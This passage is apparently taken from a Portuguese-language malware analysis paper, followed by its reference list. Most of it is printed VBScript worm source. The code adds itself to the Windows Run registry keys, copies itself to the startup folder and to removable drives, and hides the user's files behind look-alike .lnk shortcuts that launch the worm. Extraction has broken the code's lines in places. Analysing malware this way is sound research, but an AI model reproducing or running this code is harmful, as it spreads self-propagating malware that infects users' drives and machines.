sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr
& fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr
& fn & chrw(34), "REG_SZ"
fs.copyfile
wscript.scriptfullname,
CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
' Removable drive
if xx.drivetype=1 then
if fs.fileexists(xx.path & "\" & fn) then
fs.getfile(xx.path & "\" & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & "\" & fn,true
For Each x In fs.GetFolder( xx.path & "\" ).Files
wscript.sleep 1
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 2
if ucase(x.name) <> ucase(fn) then
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.Arguments = "/c start " & Replace(fn," ", ChrW(34) _
& " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " &
exit"
.IconLocation
=
sh.regread("HKLM\SOFTWARE\Classes\"
&
sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) &
"\") & "\DefaultIcon\")
if instr( .iconlocation,",")=0 then
.iconlocation = .iconlocation &",0"
end if
.Save()
end with
end if
end if
end if
Next
157
&"\"
&
fn
158
IV. Referncias
ASCII to Hex and other free text conversion tools. Disponvel em: <http://www.
asciitohex.com/>. Acesso em: 19 mar 2014.
Decode from Base64 format. Disponvel em: <http://www.base64decode.org/>.
Acesso em: 19 mar 2014.
KASPERSKY. Automatiser une tache aprs dsinfection. Disponvel em: <
http://forum.kaspersky.com/index.php?showtopic=286365 >. Acesso em: 19 mar
2014.
159